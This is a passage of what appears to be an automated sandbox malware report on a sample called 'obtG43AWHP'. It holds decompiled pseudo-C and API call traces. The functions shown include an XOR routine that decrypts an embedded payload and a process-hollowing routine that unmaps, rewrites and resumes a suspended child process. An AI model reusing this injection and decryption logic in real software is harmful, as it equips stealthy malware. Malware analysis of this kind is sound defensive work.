      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}














    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd

    Execution Graph

    Execution Coverage:2.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:45.8%
    Total number of Nodes:24
    Total number of Limit Nodes:5

    Graph


    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0020E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0020E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0020E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0020E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0020E35A
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
      • Part of subcall function 0020E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
      • Part of subcall function 0020E080: CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0020E54C
      • Part of subcall function 0020E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
      • Part of subcall function 0020E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000005.00000002.1478924566.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_20d000_obtG43AWHP.jbxd

    Execution Graph

    Execution Coverage:2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:5%
    Total number of Nodes:622
    Total number of Limit Nodes:8

    Graph


    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
